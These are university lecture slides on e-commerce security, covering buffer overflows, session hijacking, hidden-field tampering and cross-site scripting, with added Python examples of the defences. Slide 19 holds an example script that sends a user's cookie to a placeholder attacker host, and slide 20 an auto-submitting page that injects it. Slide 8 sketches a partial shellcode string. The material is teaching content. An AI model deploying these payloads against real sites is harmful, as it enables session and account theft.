CSE 190: Internet E-Commerce - PowerPoint PPT Presentation

Provided by: anandbala
Learn more at: https://cseweb.ucsd.edu
1
CSE 190 Internet E-Commerce
  • Lecture 15: Security

2
Security: Three Focuses
  • Prevention
    • Most common approach
  • Detection
    • Beyond Intrusion Detection Systems (IDS): what is the application's own responsibility?
  • Recovery
    • Often neglected
  • Reference: Secrets and Lies, by Bruce Schneier

3
Security Posture of an e-Commerce Infrastructure
4
Attack: Buffer Overflow
  • Based on a boundary-checking failure
  • Vulnerable function (as on the slide; strcpy() copies until the NUL terminator, regardless of the size of buf):
      void foo(char *s)
      {
          char buf[42];
          // ...
          strcpy(buf, s);
          // ...
      }
  • What if strlen(s) > 42? (Already at strlen(s) == 42 the NUL terminator lands outside buf.)

5
Stack Frame (before the copy; the diagram abbreviates buf to a few bytes)
  SP -> buf   0000 0000   (42 bytes, zeroed)
        RET   08000490    (saved return address)
        s     FFFF2480    (argument: pointer to the caller's string)
Consider s = "AAAAAAAAAAAAAAAAAA..." (a run of 'A', byte 0x41, longer than buf)
6
Stack Frame (after strcpy)
  SP -> buf   4141 4141   (filled with 'A')
        RET   41414141    (saved return address overwritten with 0x41414141)
        s     41414141
Consider s = "AAAAAAAAAAAAAAAAAA...": when foo() returns, execution jumps to address 0x41414141
7
Executing Code
  • Basic principle
    • Place code in the buffer
    • Overwrite the return address so that it points into that code
  • Shell code
    • Often execve("/bin/sh", args)
    • NOP sled: a run of no-op instructions in front of the shellcode, so the guessed return address only has to land somewhere in the sled

8
Shell Code (cont)
  s = "\x90\x90...\x90"                        /* NOP sled */
      "\xeb.../bin/sh"                         /* shellcode */
      "\xff\xff\x01\xde...\xff\xff\x01\xde"    /* return address, repeated */
  Resulting stack frame:
    SP -> buf   9090...9090 EBAF...68 FFFF...DE   (sled, shellcode, start of the repeated address)
          RET   FFFF01DE    (now points into the NOP sled)
          s     FFFF01DE
9
Buffer Overflow Impact
  • Execute arbitrary code with the privileges of the vulnerable process
  • Often remotely exploitable
  • Examples
  • Code Red (Microsoft IIS Indexing DLL)
  • Oracle 8i TNS Listener
  • Netscape Enterprise Content Negotiation

10
Buffer Overflow Mitigation
  • Coding standards
    • strncpy() instead of strcpy(), etc.
    • Completeness? (strncpy() leaves buf without a NUL terminator when the source fills it, and the rule has to be applied at every copy)
  • Code audits
    • Manual/automated
  • Robust/automated memory management
    • String classes
    • Java, Perl, etc.
  • Testing
    • Coverage?
    • Establishing correctness through testing is harder than writing the code
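The frame from slides 5 and 6 and the strncpy() caveat above, as an added example that is not part of the lecture. It simulates the copy in a byte array rather than running native code; the layout it assumes (a 42-byte buf followed directly by a little-endian 4-byte return address, no padding or canary) is chosen to match the slide's picture and is not what every compiler produces.

```python
import struct
from typing import Tuple

BUF_SIZE = 42                  # char buf[42] from the slide
RET_ADDR = 0x08000490          # legitimate saved return address from the slide
FRAME_SIZE = BUF_SIZE + 4      # buf followed directly by the 4-byte RET (assumed layout)


def new_frame() -> bytearray:
    """Model frame: buf zeroed, RET holding the legitimate return address."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<I", frame, BUF_SIZE, RET_ADDR)   # little-endian, as on x86
    return frame


def saved_ret(frame: bytearray) -> int:
    """Read back the saved return address that follows buf."""
    return struct.unpack_from("<I", frame, BUF_SIZE)[0]


def strcpy_model(s: bytes) -> int:
    """strcpy(buf, s): copies strlen(s)+1 bytes, NUL included, with no regard
    for sizeof buf. Returns the RET value left in the frame. (The model stops
    at the end of its own array; a real strcpy would keep going.)"""
    frame = new_frame()
    data = s + b"\x00"
    n = min(len(data), FRAME_SIZE)
    frame[:n] = data[:n]
    return saved_ret(frame)


def strncpy_model(s: bytes) -> Tuple[int, bool]:
    """strncpy(buf, s, sizeof buf): never writes past buf, but when
    strlen(s) >= sizeof buf it leaves no NUL terminator, so a later read of
    buf as a string runs on into RET. Returns (RET, buf_is_terminated)."""
    frame = new_frame()
    chunk = s[:BUF_SIZE]
    frame[:len(chunk)] = chunk        # strncpy zero-pads the rest; the frame is already zero
    return saved_ret(frame), b"\x00" in frame[:BUF_SIZE]


def bounded_copy(s: bytes) -> Tuple[int, bool]:
    """Hardened copy: check that s and its terminator fit and refuse the input
    otherwise, instead of truncating silently. Returns (RET, accepted)."""
    frame = new_frame()
    if len(s) + 1 > BUF_SIZE:
        return saved_ret(frame), False
    frame[:len(s) + 1] = s + b"\x00"
    return saved_ret(frame), True


if __name__ == "__main__":
    for n in (18, 42, 46):
        print(f"strcpy of {n} 'A's leaves RET = {strcpy_model(b'A' * n):#010x}")
    print("strncpy of 42 'A's: (RET, terminated) =", strncpy_model(b"A" * 42))
    print("bounded copy of 46 'A's: (RET, accepted) =", bounded_copy(b"A" * 46))
```

Three inputs tell the story: 18 bytes fit and RET survives; exactly 42 bytes already corrupt the low byte of RET through the terminator alone; 46 bytes put 0x41414141 in RET, which is the slide's picture. strncpy() protects RET but hands back an unterminated buf, which is why "Completeness?" is the right question.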

11
Attack: Hijacking Sessions
  • Insufficient entropy (randomness) in session IDs
  • Client 1
    • Cookie: sess=TWGYLZIAAACVDQ3UUSZQV2I
  • Client 2
    • Cookie: sess=TWGY0WYAAACVFQ3UUSZQV2I
  • Only a handful of characters differ between the two IDs: holding one makes its neighbours easy to guess
  • E.g., IBM WebSphere 3.x
12
Session Hijacking Impact
  • Brute-force search for valid session IDs
    • The web server acts as the oracle: it tells the attacker whether a guessed ID is live
  • Full, unauthorized control over the user's session
    • Information disclosure
    • Online theft
    • Pretexting

13
Session Hijacking Mitigation
  • Generate session IDs using a cryptographically strong PRNG
    • Seeded from a good source of entropy, e.g. /dev/urandom
  • Cryptographic verification
    • E.g. an HMAC-SHA1 tag over the ID, so guessed IDs are rejected before any session lookup
  • App-level IDS
    • Alert on multiple invalid session IDs from the same client
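The three mitigations above in one piece of code, as an added example that is not the lecture's own. Assumptions: a 16-byte random ID from the OS CSPRNG, HMAC-SHA256 as the tag (the slide's HMAC-SHA1 works identically), and a per-client counter of invalid IDs as the app-level IDS. The two cookie values fed to differing_positions() are the ones on slide 11.

```python
import hashlib
import hmac
import secrets
from collections import defaultdict

ID_BYTES = 16                            # 128 bits of randomness per session
TAG_BYTES = 16                           # truncated HMAC appended to the ID
SERVER_KEY = secrets.token_bytes(32)     # per-deployment secret; never sent to clients


def differing_positions(a: str, b: str) -> int:
    """Character positions at which two IDs differ. For the WebSphere-style
    cookies on the slide this is tiny, which is the whole problem."""
    return sum(x != y for x, y in zip(a, b)) + abs(len(a) - len(b))


def new_session_id(key: bytes = SERVER_KEY) -> str:
    """secrets draws from os.urandom() (/dev/urandom on Linux), i.e. a CSPRNG,
    not the language's general-purpose random generator."""
    rand = secrets.token_bytes(ID_BYTES)
    tag = hmac.new(key, rand, hashlib.sha256).digest()[:TAG_BYTES]
    return (rand + tag).hex()


def verify_session_id(sid: str, key: bytes = SERVER_KEY) -> bool:
    """Reject malformed or unsigned IDs in constant time before touching the
    session store, so the store never serves as a validity oracle."""
    try:
        raw = bytes.fromhex(sid)
    except ValueError:
        return False
    if len(raw) != ID_BYTES + TAG_BYTES:
        return False
    rand, tag = raw[:ID_BYTES], raw[ID_BYTES:]
    expected = hmac.new(key, rand, hashlib.sha256).digest()[:TAG_BYTES]
    return hmac.compare_digest(tag, expected)


class SessionGuessDetector:
    """App-level IDS: count invalid session IDs per client address and record
    an alert the moment the threshold is reached."""

    def __init__(self, threshold: int = 5):
        self.threshold = threshold
        self.failures = defaultdict(int)
        self.alerts = []

    def observe(self, client: str, sid: str) -> bool:
        ok = verify_session_id(sid)
        if not ok:
            self.failures[client] += 1
            if self.failures[client] == self.threshold:
                self.alerts.append(client)
        return ok


if __name__ == "__main__":
    print(differing_positions("TWGYLZIAAACVDQ3UUSZQV2I", "TWGY0WYAAACVFQ3UUSZQV2I"))
    sid = new_session_id()
    print(sid, verify_session_id(sid))
    det = SessionGuessDetector(threshold=3)
    for guess in range(3):
        det.observe("10.0.0.7", "%064x" % guess)     # constructed sequential guesses
    print(det.alerts)
```

With the tag in place a brute-force search has to forge an HMAC rather than merely hit a live ID, and every failed attempt is counted against the source address instead of silently returning "no such session".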

14
Client State Perturbation
  <FORM METHOD=POST ACTION=https://merchant.com/buy.cgi>
    . . .
    <INPUT TYPE=HIDDEN NAME=TOTAL VALUE=46.90>
    <INPUT TYPE=SUBMIT VALUE="OK">
  </FORM>
  The price travels in a hidden field, which the client can edit to any value before submitting
15
Client State Perturbation Impact
  • Fraud (previous example: submit the form with a lower TOTAL)
  • Unauthorized access to information
    • https://url.com/show_account.cgi?cust_id=29352 (change cust_id to view another customer's account)
  • Unauthorized modification of data

16
Client State Perturbation Mitigation
  • Do not trust any value received from the client (URL parameters, forms, cookies)
    • Cross-validate against known session state
    • Cryptographically verify arguments (MAC)
  • Minimize the state maintained on the client
    • Server-side session object
    • Stateless UI flows
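The buy.cgi and show_account.cgi handlers from slides 14 and 15 with the mitigations above applied, as an added example that is not the lecture's code. Assumptions: a server-side SESSIONS dictionary with constructed sample data, a SERVER_KEY, a TOTAL_MAC hidden field whose MAC binds the value to the session and field name, and a cross-check of every client-supplied argument against the session.

```python
import hashlib
import hmac
import secrets
from typing import Tuple
from urllib.parse import parse_qs

SERVER_KEY = secrets.token_bytes(32)

# Server-side session store (session id -> state). Constructed sample data.
SESSIONS = {
    "s1": {"cust_id": 29352, "cart_total": "46.90"},
    "s2": {"cust_id": 31007, "cart_total": "12.00"},
}


def sign_field(sid: str, name: str, value: str) -> str:
    """MAC over (session, field name, value): the value cannot be edited, and
    the tag cannot be replayed into another field or another user's session."""
    msg = b"\x00".join(p.encode() for p in (sid, name, value))
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def render_buy_form(sid: str) -> str:
    """The slide's form, with a MAC travelling next to the hidden TOTAL."""
    total = SESSIONS[sid]["cart_total"]
    mac = sign_field(sid, "TOTAL", total)
    return (
        '<FORM METHOD=POST ACTION="https://merchant.com/buy.cgi">'
        f'<INPUT TYPE=HIDDEN NAME=TOTAL VALUE="{total}">'
        f'<INPUT TYPE=HIDDEN NAME=TOTAL_MAC VALUE="{mac}">'
        '<INPUT TYPE=SUBMIT VALUE="OK"></FORM>'
    )


def handle_buy(sid: str, body: str) -> Tuple[int, str]:
    """buy.cgi: accept TOTAL only if its MAC verifies for this session and it
    still matches the server-side cart; otherwise refuse without charging."""
    if sid not in SESSIONS:
        return 403, "no session"
    form = parse_qs(body)
    total = form.get("TOTAL", [""])[0]
    mac = form.get("TOTAL_MAC", [""])[0]
    if not hmac.compare_digest(mac.encode(), sign_field(sid, "TOTAL", total).encode()):
        return 400, "tampered TOTAL"
    if total != SESSIONS[sid]["cart_total"]:      # stale form after the cart changed
        return 400, "TOTAL does not match cart"
    return 200, f"charged {total}"


def show_account(sid: str, query: str) -> Tuple[int, str]:
    """show_account.cgi: cust_id from the URL is never trusted on its own; it
    must equal the customer bound to the authenticated session."""
    if sid not in SESSIONS:
        return 403, "no session"
    requested = parse_qs(query).get("cust_id", [""])[0]
    if requested != str(SESSIONS[sid]["cust_id"]):
        return 403, "cust_id does not belong to this session"
    return 200, f"account {requested}"


if __name__ == "__main__":
    print(render_buy_form("s1"))
    mac = sign_field("s1", "TOTAL", "46.90")
    print(handle_buy("s1", f"TOTAL=46.90&TOTAL_MAC={mac}"))   # legitimate
    print(handle_buy("s1", f"TOTAL=0.01&TOTAL_MAC={mac}"))    # edited hidden field
    print(show_account("s1", "cust_id=31007"))                # another customer's id
```

Keeping the price in the server-side session makes the MAC a second line of defence rather than the only one: even a valid tag is rejected if the cart has moved on since the form was rendered.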

17
Attack: Cross-Site Scripting
  Merchant.com's search page echoes the query verbatim into the result page:
    ... <P>Search results for query xyz</P><HR> ...
  Rendered page: "Search results for query xyz", followed by the product "DVD XYZ"
18
Cross-Site Scripting (cont)
  Submitting the query <SCRIPT>alert('boo!')</SCRIPT> to Merchant.com's product search produces:
    ... <P>Search results for query <SCRIPT>alert('boo!')</SCRIPT></P><HR>Nothing found ...
  The browser renders "Search results for query Nothing found" and runs the injected script, which pops up an alert box reading "boo!"
19
Cross-Site Scripting: Malicious Script
  <form name=snag action=http://evil.org/snag_it.cgi method=post>
    <input type=hidden name=it>
  </form>
  <script>
    document.snag.it.value = document.cookie;
    document.snag.submit();
  </script>
  • The script discloses the cookie to evil.org
  • JavaScript security model
    • Same-origin policy
    • A script can only access properties of objects from its own domain of origin
  • So how does the attacker get this script to execute with origin merchant.com?

20
Cross-Site Scripting: Injecting Malicious Script
  • Arrange for the target to view a page containing <iframe src=".../evil.html">
    • Any page under evil.org's control
    • HTML email
  • evil.html form-POSTs to merchant.com with the snag form as the query; the reflected result page then form-POSTs the cookie to evil.org
  • http://evil.org/evil.html:
      <form name=f action=http://www.merchant.com/search.cgi method=post>
        <input type=text name=query value="<form name=snag ...>">
        <input type=submit ...>
      </form>
      <script>document.f.submit()</script>

21
Cross-Site Scripting: Impact
  • Unauthorized disclosure of user information
  • Unauthorized control over user sessions
  • Theft
  • Etc.

22
Cross-Site Scripting Mitigation
  • Escape user input before rendering it inline with HTML, so that
    <P>Search results for query <SCRIPT>  becomes  <P>Search results for query &lt;SCRIPT&gt;
  • Challenges
    • Input processing: inputs are usually handled verbatim (stored and echoed back unchanged)
    • Output processing: coverage (every place that echoes input, in every HTML context, has to escape)
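The search page from slides 17 and 18 rendered both ways, as an added example that is not the lecture's code. It uses Python's html.escape() as the escaping routine; the page template, the hit list and the attribute-context payload ATTR_QUERY are assumptions constructed to show the coverage problem: escaping only angle brackets is not enough once the value lands inside a quoted attribute.

```python
import html
import re
from typing import List

XSS_QUERY = "<SCRIPT>alert('boo!')</SCRIPT>"      # the slide's payload
ATTR_QUERY = '" AUTOFOCUS ONFOCUS="alert(1)'        # constructed: no angle brackets needed


def render_unsafe(query: str, hits: List[str]) -> str:
    """Verbatim echo, as search.cgi on the slide does."""
    body = "".join(f"<LI>{h}" for h in hits) or "Nothing found"
    return f"<P>Search results for query {query}</P><HR>{body}"


def render_escaped(query: str, hits: List[str]) -> str:
    """Escape at output time, separately for every place the value lands:
    the text of the <P>, the search box's VALUE attribute, and each hit."""
    q_text = html.escape(query)                   # & < > " ' -> entities
    q_attr = html.escape(query, quote=True)       # quotes must be escaped in attributes
    body = "".join(f"<LI>{html.escape(h)}" for h in hits) or "Nothing found"
    return (
        f"<P>Search results for query {q_text}</P>"
        '<FORM METHOD=POST ACTION="/search.cgi">'
        f'<INPUT TYPE=TEXT NAME=query VALUE="{q_attr}"></FORM>'
        f"<HR>{body}"
    )


def render_attr(query: str, escape_quotes: bool) -> str:
    """Just the search box, with or without quote escaping, to show why
    partial escaping leaves the attribute context open."""
    v = html.escape(query, quote=escape_quotes)
    return f'<INPUT TYPE=TEXT NAME=query VALUE="{v}">'


def attribute_value(tag: str) -> str:
    """What a browser takes as the VALUE attribute: up to the first unescaped
    double quote. Anything after that is parsed as further attributes."""
    m = re.search(r'VALUE="([^"]*)"', tag)
    return m.group(1) if m else ""


def contains_script_tag(page: str) -> bool:
    """Crude check: does the rendered page carry a live <script> element?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_unsafe(XSS_QUERY, []))
    print(render_escaped(XSS_QUERY, []))
    print(render_attr(ATTR_QUERY, escape_quotes=False))   # breaks out of VALUE
    print(render_attr(ATTR_QUERY, escape_quotes=True))    # stays inside VALUE
```

The text-context fix is the one the slide shows: the injected tag becomes &lt;SCRIPT&gt; and is displayed, not executed. The attribute case is the "coverage" challenge in miniature: with escape_quotes=False the rendered tag reads VALUE="" AUTOFOCUS ONFOCUS="alert(1)", a working event handler with no angle bracket in sight.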

23
Architectural Considerations: Dealing with the Unknown
  • Defense in depth
  • Trust relationships
  • Compartmentalization
  • Encryption
  • Passive defense vs. active response

24
Multi-Tiered Architecture
  • Tight filtering policies between the networks of the tiers
  • Effective against unknown vulnerabilities whose impact is "execute code on the server": a compromised host can reach only what the filters between tiers allow
  • Host/network IDS with response capability

25
Security DMZ
  • DMZ: Demilitarized Zone
  • Servers designated as less secure (nothing to do with terrorism!)
  • Use two firewalls to create a DMZ; put the database behind the 2nd

26
Trust Relationships / Compartmentalization
  • Minimize assumptions and trust between architectural tiers and software layers
  • Multiple layers of validation
  • Independent authentication/authorization
    • E.g. granular DB-level access control
      • Views
      • Stored procedures
    • Mitigates input validation errors in the layers above

27
Encryption
  • Protection of data in transit and in the persistent store
    • 3DES, AES, RSA
    • SSL
  • Data protection in a partially compromised system
    • Insider threat
    • Separation of duties (DBA vs. key management)

28
Encryption
  • Secure Sockets Layer (SSL)
    • Sits between HTTP and TCP: the HTTP content is encrypted just before it is handed to TCP/IP for transmission
    • HTTPS denotes HTTP over SSL. The default port is 443 (as opposed to 80 for plain HTTP); both can run on the same machine
    • Client and server negotiate session-long encryption keys, and the server authenticates itself with a certificate

29
Defense vs. Recovery
  • No software is 100% bug free
  • Some bugs constitute vulnerabilities
  • Therefore no software is 100% secure
  • Detection and response capabilities
    • Exception handling
    • Log scanning
    • Operator alerts